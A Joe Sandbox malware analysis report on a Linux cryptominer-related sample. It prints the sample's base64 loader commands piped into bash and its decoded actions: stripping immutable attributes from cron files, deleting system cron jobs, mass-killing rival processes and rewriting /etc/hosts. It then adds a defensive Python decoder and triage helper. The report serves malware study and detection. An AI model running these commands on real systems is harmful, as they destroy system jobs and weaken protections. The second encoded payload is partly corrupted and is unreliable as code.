Joe Sandbox Analysis Report
ID: 198785
Sample Name: RCxcx0vm78.bin
Cookbook: defaultlinuxfilecookbook.jbs
Time: 19:29:51
Date: 02/01/2020
Version: 28.0.0 Lapis Lazuli

Copyright Joe Security LLC 2020


Analysis Report RCxcx0vm78.bin

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 198785
Start date: 02.01.2020
Start time: 19:29:51
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 17s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RCxcx0vm78.bin
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal52.troj.evad.linBIN@0/3@0/0

Detection

Strategy: Threshold
Score: 52 (range 0 - 100)
Whitelisted: false

Classification

(Radar chart; not recoverable as text.) Axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Scale: malicious / suspicious / clean. The classification label for this sample is mal52.troj.evad.linBIN@0/3@0/0, i.e. a score of 52 with Trojan and Evader traits on a Linux binary.

Mitre Att&ck Matrix

Techniques matched in this analysis, grouped by tactic (count of matching signatures in parentheses; the remaining cells of the matrix are unmatched placeholders):

Execution: Local Job Scheduling (2), Command-Line Interface (1), Scripting (1)
Persistence: Local Job Scheduling (2), Hidden Files and Directories (1)
Defense Evasion: Hidden Files and Directories (1), File and Directory Permissions Modification (1), Scripting (1), File Deletion (1)
Discovery: Security Software Discovery (1), System Information Discovery (1), System Network Configuration Discovery (1)

No technique matched under Initial Access, Privilege Escalation, Credential Access, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects or Remote Service Effects.

Signature Overview

• Bitcoin Miner • System Summary • Persistence and Installation Behavior • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • Lowering of HIPS / PFW / Operating System Security Settings


Bitcoin Miner:

Reads CPU information from /sys indicative of miner or evasive malware

System Summary:

Sample contains only a LOAD segment without any section mappings

Classification label: mal52.troj.evad.linBIN@0/3@0/0

Persistence and Installation Behavior:

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Counts the number of processes currently running

Creates hidden files and/or directories

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "grep" command used to find patterns in files or piped streams

Executes the "kill" command typically used to terminate processes

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Executes the "awk" command used to scan for patterns (typically in standard output)

Hooking and other Techniques for Hiding and Protection:

Sample deletes itself

Executes the "base64" command used to encode or decode data (e.g. files, payloads)

Malware Analysis System Evasion:

Reads CPU information from /sys indicative of miner or evasive malware

Uses the "" system call to query kernel version information (possible evasion)

Lowering of HIPS / PFW / Operating System Security Settings:

Removes protection from files

Malware Configuration

No configs have been found

Runtime Messages

Command: /tmp/RCxcx0vm78.bin
Exit code: 0
Exit code info: (none)
Killed: False
Standard output: (empty)
Standard error: (empty)

Behavior Graph

(Rendered as an image; ID 198785, sample RCxcx0vm78.bin, start date 02/01/2020, process architecture LINUX, score 52. Content recoverable from the graph:)

Process chain: RCxcx0vm78.bin -> sh -> base64, bash -> ls, mkdir; RCxcx0vm78.bin -> sh -> base64, bash -> crontab, crontab, xargs -> fuser, rm, kill, chattr, chattr; plus 25 other processes.
Dropped file: /var/spool/cron/crontabs/tmp.pKGrnA (ASCII).
Signatures shown on the graph: Sample deletes itself; Executes the "crontab" command typically for achieving persistence; Sample tries to persist itself using cron.
No DNS/IP node is populated: the sample made no Internet contact during the run.

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: RCxcx0vm78.bin
Detection: 3%
Scanner: Virustotal

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Startup

system is lnxubuntu1

Process tree (indentation shows the parent; each exec'd child below was preceded by a "New Fork" of its parent with the same PID):

RCxcx0vm78.bin (PID: 20750, Parent: 20707, MD5: unknown) Arguments: /tmp/RCxcx0vm78.bin
  RCxcx0vm78.bin New Fork (PID: 20757, Parent: 20750)
  sh (PID: 20757, Parent: 20750, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;echo bHMgL3RtcC8uWDExLXVuaXggfHwgbWtkaXIgLXAgL3RtcC8uWDExLXVuaXgK|base64 -d|bash"
    sh New Fork (PID: 20761, Parent: 20757)
    sh New Fork (PID: 20762, Parent: 20757)
    base64 (PID: 20762, Parent: 20757, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
    sh New Fork (PID: 20763, Parent: 20757)
    bash (PID: 20763, Parent: 20757, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: bash
      ls (PID: 20776, Parent: 20763, MD5: f3b92d795c9ee0725c160680acd084d9) Arguments: ls /tmp/.X11-unix
      mkdir (PID: 20781, Parent: 20763, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir -p /tmp/.X11-unix
  RCxcx0vm78.bin New Fork (PID: 20790, Parent: 20750)
    RCxcx0vm78.bin New Fork (PID: 20796, Parent: 20790)
    sh (PID: 20796, Parent: 20790, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KZmluZCB+Ly5 kZGcvKnx4YXJncyBmdXNlciAtawpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pCmZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWkKY3JvbnRhYiAtbCB 8Z3JlcCAtaXZFICIuXC9va2F8XC91cGR8YWxpeXVufGN1cmx8anF1ZXIuanN8a2lsbF9tfG1tbXxzeXN0ZW1kfHRtcDAwfHRyb2phbnx0cnVtcHx2aXJ1c3x3Z2V0fHgxfHgxMSJ8Y 3JvbnRhYiAtCmdyZXAgLVJFICIuXC9va2F8XC91cGR8YWxpeXVufGN1cmx8anF1ZXIuanN8a2lsbF9tfG1tbXxze" kfHRtcDAwfHRyb2phbnx0cnVtcHx2aXJ1c3x3Z2V0fHgxfHgxMSIgL2V0Yy9jcm9uLip8Y3V0IC1mIDEgLWQgOnx4YXJncyBybSAtZgpwa2lsbCAtOSAtZiAiLi9jcm9ufC4vb2thfC90b XAvZGRnc3wvdG1wL2lka3wvdG1wL2phdmF8L3RtcC9rZWVwfC90bXAvdWRldnN8L3RtcC91ZGt8L3RtcC91cGRhdGUuc2h8L3RtcC95YXJufC91c3IvYmluL25ldGZzfDgyMjB8Q WxpSGlkc3xBbGlZdW5EdW58RG9uYWxkfEhUOHN8Sm9uYXNvbnxTemRYTXxYMTMtdW5peHxYMTctdW5peHxcW3N0ZWFcXXxhZWdpc198YWxpeXVuLXNlcnZpY2V8YXp pcGx8Y3Iuc2h8Y3Jsb2dlcnxjcm9uZHN8Y3J1bnxjcnlwdG9uaWdodHxjdXJufGN1cnJufGRkZ3N8ZGhjbGVpbnR8ZnMtbWFuYWdlc yOG11bHxoYXZlZ2Vkc3xodHRwZHp8aXJxYmFsYW5jZWR8amF2YS1jfGthdWRpdGVkfGtlcmJlcm9kc3xraHVnZXBhZ2Vkc3xraW50ZWdyaXR5ZHN8a3BzbW91c2Vkc3xrc3dhc GVkfGt0aHJvdGxkc3xrdzB8a3dvcmtlcmRzfGt3b3JrcmV8a3dyb2tlcnxtZXdyc3xtaWdyYXRpb25zfG1pbmVyfG1tbXxtci5zaHxtdWhzdGl8bXlnaXR8bmV0ZG5zfG5ldHdvcmtzZXJ2 aWNlfG9yZ2ZzfHBhbWRpY2tzfHBhc3RlYmlufHFXM3hUfHF3ZWZkYXN8cmN0bGNsaXxzbGVlcHxzdHJhdHVtfHN1c3Rlc3xzdXN0c2V8c3lzZ3VhcmR8c3lzdGVhbWR8c3lzdGVt ZC1uZXR3b3JrfHN5c3VwZGF0ZXx0MDBsc3x0aGlzeHhzfFRydW1wfHVwZGF0ZS5zaHx2VHRISHx3YXRjaGJvZ3x3YXRja 3YXRjaG9nfHdpcGVmc3x3blRLWWd8eDNXcXx4aWd8eG1yfHplcjAiCm5ldHN0YXQgLWFudHB8Z3JlcCAtRSAiMTAzLjMuNjIuNjR8MTA0LjE0MC4yMDEuMTAyfDEwNC4xNDA uMjAxLjQyfDEwNC4xNDAuMjAxLjU4fDEwNC4xNDAuMjAxLjYyfDEwNC4xNDAuMjQ0LjE4NnwxMDcuMTkxLjk5LjIyMXwxMDcuMTkxLjk5Ljk1fDExOS45Ljc2LjEwN3wxMjMuNTk uMjMyLjQyfDEzMS4xNTMuNTYuOTh8MTMxLjE1My43Ni4xMzB8MTM4LjIwMS4zNi4yNDl8MTM5LjE2Mi44MS45MHwxMzkuOTkuMTAxLjE5N3wxMzkuOTkuMTAxLjE5OHwxM zkuOTkuMTAxLjIzMnwxMzkuOTkuMTAyLjcwfDEzOS45OS4xMDIuNzF8MTM5Ljk5LjEwMi43MnwxMzkuOTkuMTAyLjczfDEzOS45OS4xMDIuN 5Ljk5LjEyMC41MHwxMzkuOTkuMTIwLjczfDEzOS45OS4xMjAuNzV8MTM5Ljk5LjEyMy4xOTZ8MTM5Ljk5LjEyNC4xNzB8MTM5Ljk5LjEyNS4zOHwxMzkuOTkuMTU2LjMwfDEz OS45OS42OC4xMjh8MTQyLjQ0LjI0Mi4xMDB8MTQyLjQ0LjI0My42fDE0NC4yMTcuMTQuMTA5fDE0NC4yMTcuMTQuMTM5fDE0OS4yMDIuNDIuMTc0fDE0OS4yMDIuODMuM TcxfDE1MS44MC4xNDQuMTg4fDE1MS44MC4xNDQuMjUzfDE1OC42OS4yNS43MXwxNTguNjkuMjUuNzd8MTY0LjEzMi4xMDkuMTEwfDE3Mi4xMDQuMTY1LjE5MXwxNzIuM TA1LjIxMS4yNTB8MTcyLjgzLjE1NS4xNTE6ODB8MTc4LjYzLjEwMC4xOTd8MTkyLjk5LjY5LjE3MHwyMDcuMjQ2LjEwMC4xOTh8MjEzLjMyLjI5LjE0M uMzIuNzQuMTU3fDIxNy4xODIuMTY5LjE0OHwzNy4xODcuMTU0Ljc5fDM3LjE4Ny45NS4xMTB8MzcuNTkuNDMuMTMxfDM3LjU5LjQzLjEzNnwzNy41OS40NC4xOTN8MzcuNT kuNDQuOTN8MzcuNTkuNDUuMTc0fDM3LjU5LjU0LjIwNXwzNy41OS41NS42MHwzNy45LjMuMjZ8NDUuMzIuNzEuODJ8NDUuNzYuNjUuMjIzfDQ3LjEwMS4zMC4xMjR8NTEu MTUuNTQuMTAyfDUxLjE1LjU1LjEwMHw1MS4xNS41NS4xNjJ8NTEuMTUuNTguMjI0fDUxLjE1LjY1LjE4Mnw1MS4xNS42Ny4xN3w1MS4xNS42OS4xMzZ8NTEuMTUuNzguNjh 8NTEuMjU1LjM0LjExOHw1MS4yNTUuMzQuNzl8NTEuMjU1LjM0LjgwfDUuMTk2LjEzLjI5fDUuMTk2LjIzLjI0MHw1LjE5Ni4yNi45Nnw1NC4zNy43L 2MS4xNTUuMjIxLjc0fDY2LjQyLjEwNS4xNDZ8NzkuMTM3LjgyLjV8ODguOTkuMTkzLjI0MHw4OC45OS4yNDIuOTJ8OTEuMTIxLjE0MC4xNjd8OTEuMTIxLjIuNzZ8OTIuMjIyLjEw LjU5fDkyLjIyMi4xODAuMTE5fDk0LjEzMC4xMi4yN3w5NC4xMzAuMTIuMzB8OTQuMTMwLjE2NS44NXw5NC4xMzAuMTY1Ljg3fDk0LjIzLjIzLjUyfDk0LjIzLjI0Ny4yMjYifGF3ayB7 J3ByaW50ICRORid9IHxjdXQgLWQvIC1mMXx4YXJncyBraWxsIC05CnJtIC1mIH4vLnthbGl5dW4qLHN5c3RlbWQqLHRtcCosdHJ1bXAqLHdnZXQqfSAvZXRjL2Nyb24uZC97Km FsaXl1biosKnN5c3RlbWQqLCp0cnVtcCp9IC9vcHQveyphbGl5dW4qLCpzeXN0ZW1kKiwqdHJ1bXAqfSAKa2lsbCAtOSAkK vdG1wLy5YMTEtdW5peC8wMSkKa2lsbCAtOSAkKGNhdCAvdG1wLy5YMTEtdW5peC8wKQpncmVwIC1xIHRydW1wIC9ldGMvaG9zdHMgJiYgc2VkIC1pICcvdHJ1bXAvZCcgL2 V0Yy9ob3N0cwpncmVwIC1xIHRvcjJ3IC9ldGMvaG9zdHMgJiYgc2VkIC1pICcvdG9yMncvZCcgL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIGFsaXl1bi5vbmUiIC9ldGMvaG9z dHMgfHwgZWNobyAiMC4wLjAuMCBhbGl5dW4ub25lIiA+PiAvZXRjL2hvc3RzCmdyZXAgLXEgIjAuMC4wLjAgbHNkLnN5c3RlbXRlbi5vcmciIC9ldGMvaG9zdHMgfHwgZWNobyAi MC4wLjAuMCBsc2Quc3lzdGVtdGVuLm9yZyIgPj4gL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIHBhc3RlYmluLmNvbSIgL2V0Y "0cyB8fCBlY2hvICIwLjAuMC4wIHBhc3RlYmluLmNvbSIgPj4gL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIHBtLmNwdW1pbmVycG9vbC5jb20iIC9ldGMvaG9zdHMgfHwgZW NobyAiMC4wLjAuMCBwbS5jcHVtaW5lcnBvb2wuY29tIiA+PiAvZXRjL2hvc3RzCmdyZXAgLXEgIjAuMC4wLjAgc3lzdGVtdGVuLm9yZyIgL2V0Yy9ob3N0cyB8fCBlY2hvICIwLjAuM C4wIHN5c3RlbXRlbi5vcmciID4+IC9ldGMvaG9zdHMKCg== |base64 -d|bash"
      (Payload reproduced as extracted from the PDF text layer: characters were lost at several line wraps, marked by stray spaces and quotation marks, so the blob no longer decodes cleanly end to end. Its intact head decodes to exec &>/dev/null, an export PATH=... line and the three find ... | xargs ... commands; the rest corresponds to the commands run by bash PID 20803 below, plus kill -9 $(cat /tmp/.X11-unix/01), kill -9 $(cat /tmp/.X11-unix/0) and the grep -q ... || echo "0.0.0.0 <name>" >> /etc/hosts appends that produced the dropped /etc/hosts.)
      sh New Fork (PID: 20801, Parent: 20796)
      sh New Fork (PID: 20802, Parent: 20796)
      base64 (PID: 20802, Parent: 20796, MD5: 855d7e0819b22d9cfca26f75fbcdf4ed) Arguments: base64 -d
      sh New Fork (PID: 20803, Parent: 20796)
      bash (PID: 20803, Parent: 20796, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: bash
        find (PID: 20825, Parent: 20803, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /home/user/.ddg/*
        xargs (PID: 20826, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs fuser -k
          fuser (PID: 20832, Parent: 20826, MD5: d2e863e32c9f969b17d78c175daadbae) Arguments: fuser -k
        find (PID: 20859, Parent: 20803, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/crontab /etc/cron.weekly
        xargs (PID: 20860, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs chattr -i
          chattr (PID: 20876, Parent: 20860, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /etc/cron.d /etc/cron.d/popularity-contest /etc/cron.d/mdadm /etc/cron.d/php /etc/cron.d/.placeholder /etc/cron.d/ /etc/cron.daily /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/ /etc/cron.daily/popularity-contest /etc/cron.daily/0anacron /etc/cron.daily/bsdmainutils /etc/cron.daily/mdadm /etc/cron.daily/upstart /etc/cron.daily/mlocate /etc/cron.daily/.placeholder /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/logrotate /etc/cron.daily/dpkg /etc/cron.daily/apport /etc/cron.hourly /etc/cron.hourly/.placeholder /etc/cron.monthly /etc/cron.monthly/0anacron /etc/cron.monthly/.placeholder /etc/crontab /etc/cron.weekly /etc/cron.weekly/fstrim /etc/cron.weekly/man-db /etc/cron.weekly/0anacron /etc/cron.weekly/.placeholder /etc/cron.weekly/update-notifier-common
        find (PID: 20885, Parent: 20803, MD5: e9b4574b80985a4dc1c451ee3146311d) Arguments: find /var/spool/cron
        xargs (PID: 20886, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs chattr -i
          chattr (PID: 20904, Parent: 20886, MD5: 8aa970e89963faf71434e3a37222cc49) Arguments: chattr -i /var/spool/cron /var/spool/cron/crontabs /var/spool/cron/atjobs /var/spool/cron/atjobs/.SEQ /var/spool/cron/atspool
        crontab (PID: 20909, Parent: 20803, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -l
        grep (PID: 20910, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -ivE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11
        crontab (PID: 20911, Parent: 20803, MD5: ff68fd30f0037fd7e9c1fdf5a035f739) Arguments: crontab -
        grep (PID: 20994, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -RE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11 /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
        cut (PID: 20995, Parent: 20803, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -f 1 -d :
        xargs (PID: 20996, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs rm -f
          rm (PID: 21009, Parent: 20996, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/cracklib-runtime /etc/cron.daily/mlocate /etc/cron.daily/mlocate /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/update-notifier-common
        pkill (PID: 21023, Parent: 20803, MD5: f3b843351a404d4e8d4ce0ed0775fa9c) Arguments: pkill -9 -f ./cron|./oka|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliYunDun|Donald|HT8s|Jonason|SzdXM|X13-unix|X17-unix|\\[stea\\]|aegis_|aliyun-service|azipl|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|java-c|kaudited|kerberods|khugepageds|kintegrityds|kpsmouseds|kswaped|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice|orgfs|pamdicks|pastebin|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|systeamd|systemd-network|sysupdate|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0
        netstat (PID: 21059, Parent: 20803, MD5: 78d9a4b9c73de4d9fb0257c5588d67b1) Arguments: netstat -antp
        grep (PID: 21060, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E 103.3.62.64|104.140.201.102|104.140.201.42|104.140.201.58|104.140.201.62|104.140.244.186|107.191.99.221|107.191.99.95|119.9.76.107|123.59.232.42|131.153.56.98|131.153.76.130|138.201.36.249|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.73|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|149.202.42.174|149.202.83.171|151.80.144.188|151.80.144.253|158.69.25.71|158.69.25.77|164.132.109.110|172.104.165.191|172.105.211.250|172.83.155.151:80|178.63.100.197|192.99.69.170|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|37.187.154.79|37.187.95.110|37.59.43.131|37.59.43.136|37.59.44.193|37.59.44.93|37.59.45.174|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|47.101.30.124|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|5.196.13.29|5.196.23.240|5.196.26.96|54.37.7.208|61.155.221.74|66.42.105.146|79.137.82.5|88.99.193.240|88.99.242.92|91.121.140.167|91.121.2.76|92.222.10.59|92.222.180.119|94.130.12.27|94.130.12.30|94.130.165.85|94.130.165.87|94.23.23.52|94.23.247.226
        awk (PID: 21061, Parent: 20803, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk "{print $NF}"
        cut (PID: 21062, Parent: 20803, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -d/ -f1
        xargs (PID: 21063, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs kill -9
          kill (PID: 21104, Parent: 21063, MD5: 5484331628ba283a0cda9730dafe47f8) Arguments: kill -9
        rm (PID: 21105, Parent: 20803, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f /home/user/.aliyun* /home/user/.systemd* /home/user/.tmp* /home/user/.trump* /home/user/.wget* /etc/cron.d/*aliyun* /etc/cron.d/*systemd* /etc/cron.d/*trump* /opt/*aliyun* /opt/*systemd* /opt/*trump*
        cat (PID: 21106, Parent: 20803, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /tmp/.X11-unix/01
        cat (PID: 21107, Parent: 20803, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /tmp/.X11-unix/0
        grep (PID: 21108, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q trump /etc/hosts
        grep (PID: 21109, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q tor2w /etc/hosts
        grep (PID: 21110, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 aliyun.one" /etc/hosts
        grep (PID: 21111, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 lsd.systemten.org" /etc/hosts
        grep (PID: 21112, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 pastebin.com" /etc/hosts
        grep (PID: 21114, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 pm.cpuminerpool.com" /etc/hosts
        grep (PID: 21117, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 systemten.org" /etc/hosts
cleanup

Reading the tree: both stages are delivered as base64 on the command line and decoded straight into bash, so no script file is written. Stage one only creates the hidden directory /tmp/.X11-unix (the sample later drops its PID file there). Stage two is a "competitor cleaner": it removes the immutable attribute from every cron path, rewrites the user crontab through grep -ivE, deletes cron files matching the same alternation, kills processes and connections associated with other mining campaigns, and blackholes their hosts in /etc/hosts. The grep -RE ... | cut -f 1 -d : | xargs rm -f step is over-broad: the alternation contains generic tokens (systemd, x1, curl, wget), so stock Ubuntu jobs (man-db, cracklib-runtime, mlocate, apt-compat, update-notifier-common) were deleted from /etc/cron.daily; a file appears once per matching line in grep -R output, which is why several paths repeat in the rm argument list. Tokens that the PDF text layer broke apart (fs-manager, java-c, networkservice|orgfs|pamdicks, rctlcli|sleep|stratum, 149.202.83.171, 51.255.34.79) have been restored from the encoded payload above.
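The two sh -c command lines in the listing above are the whole loader: a base64 blob is echoed into base64 -d and piped into bash, so the script never touches disk. The helper below is an added example, not part of the Joe Sandbox report or the sample. It pulls such blobs out of a command line, decodes them while tolerating the line-wrap whitespace and truncation a PDF text layer introduces, and derives coarse flags of the kind the report's signatures fire on. Both inputs are copied from the Startup listing: the first blob is complete (the run of "A" characters is shortened to 120 here); of the second only the intact head is used, because characters were lost further on when this page was extracted. Function names and flag strings are this example's own.

```python
import base64
import binascii
import re

# The "echo <base64> | base64 -d | bash" loader idiom seen twice in the Startup listing.
LOADER_RE = re.compile(
    r"echo\s+([A-Za-z0-9+/=\s]+?)\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b"
)

# Constructed inputs copied from the report's process tree. The second blob is only the
# intact head of the real payload; its remainder was damaged during PDF text extraction.
STAGE1_CMDLINE = (
    'sh -c "echo ' + "A" * 120
    + ';echo bHMgL3RtcC8uWDExLXVuaXggfHwgbWtkaXIgLXAgL3RtcC8uWDExLXVuaXgK|base64 -d|bash"'
)
STAGE2_BLOB_HEAD = (
    "ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Iv"
    "c2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KZmluZCB+Ly5kZGcvKnx4YXJncyBmdXNl"
    "ciAtawpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdHRyIC1pCmZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4"
    "YXJncyBjaGF0dHIgLWkK"
)
STAGE2_CMDLINE = 'sh -c "echo ' + STAGE2_BLOB_HEAD + ' |base64 -d|bash"'


def decode_blob(blob):
    """Decode a base64 blob that may carry line-wrap whitespace or be cut short.

    Returns (text, truncated). A length that is not a multiple of 4 means the blob was
    cut; the longest decodable prefix is returned and truncated is set. (None, True)
    is returned when the data is not base64 at all.
    """
    clean = re.sub(r"\s+", "", blob)
    truncated = False
    rem = len(clean) % 4
    if rem == 1:  # a lone sextet cannot encode a whole byte: drop it
        clean, truncated = clean[:-1], True
    elif rem:
        clean, truncated = clean + "=" * (4 - rem), True
    try:
        raw = base64.b64decode(clean, validate=True)
    except (binascii.Error, ValueError):
        return None, True
    return raw.decode("utf-8", errors="replace"), truncated


def extract_stages(cmdline):
    """Every echo|base64 -d|sh stage found in a command line, decoded."""
    stages = []
    for m in LOADER_RE.finditer(cmdline):
        text, truncated = decode_blob(m.group(1))
        stages.append({"blob": m.group(1), "script": text, "truncated": truncated})
    return stages


def triage(cmdline):
    """Decode the stages and raise coarse flags that mirror the report's signatures."""
    stages = extract_stages(cmdline)
    flags = set()
    if stages:
        flags.add("base64-decoded script piped into a shell")
    if re.match(r'sh -c "\s*(?:echo\s+)?A{32,}', cmdline):
        flags.add("command line padded with junk")
    for s in stages:
        script = s["script"] or ""
        if re.search(r"\b(?:ls|mkdir)\b[^\n|]*/tmp/\.", script):
            flags.add("hidden directory under /tmp")
        if "chattr -i" in script:
            flags.add("immutable attribute removed (chattr -i)")
        if re.search(r"\bfuser -k\b|\bpkill\b|\bkill -9\b", script):
            flags.add("terminates other processes")
        if re.search(r"^exec\s+&>\s*/dev/null", script, re.M):
            flags.add("silences all output")
        if re.search(r"\|\s*crontab -\s*$", script, re.M):
            flags.add("rewrites the user crontab from stdin")
    return {"stages": stages, "flags": sorted(flags)}


if __name__ == "__main__":
    for cmd in (STAGE1_CMDLINE, STAGE2_CMDLINE):
        result = triage(cmd)
        for stage in result["stages"]:
            print(stage["script"], end="")
        print("flags:", ", ".join(result["flags"]))
```

The whitespace-tolerant decoder matters in practice: blobs copied out of sandbox reports, tickets or PDFs routinely arrive wrapped, and a strict decoder rejects them outright. Note that exec &>/dev/null and the brace expansions seen in the payload are bash extensions, which is why the stage pipes into bash rather than sh.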

Created / dropped Files

/etc/hosts
Process: /bin/bash
File Type: ASCII text
Size (bytes): 116
Entropy (8bit): 3.9012421126820302
Encrypted: false
MD5: 91272B0F949D00E3ED2657A018487FAC
SHA1: CBEDB785322902FB093AFA4442745CA4DA109098
SHA-256: E3340DAB8F8F22EBD885194EFC97720A5C4F99B145BDE9CE3EDB39F4C7A2543C
SHA-512: D721A7DB8F73A1C277B331CD2347C58A0B4A9DFBA04F96A5B5D6AA98E32A325DF64D10933A582B2F6AE021A5CBA2E7F497FC001254C4A1F86523FDE45A20B944
Malicious: false
Reputation: low
Preview (the viewer renders each newline as "."; one entry per line):
0.0.0.0 aliyun.one
0.0.0.0 lsd.systemten.org
0.0.0.0 pastebin.com
0.0.0.0 pm.cpuminerpool.com
0.0.0.0 systemten.org
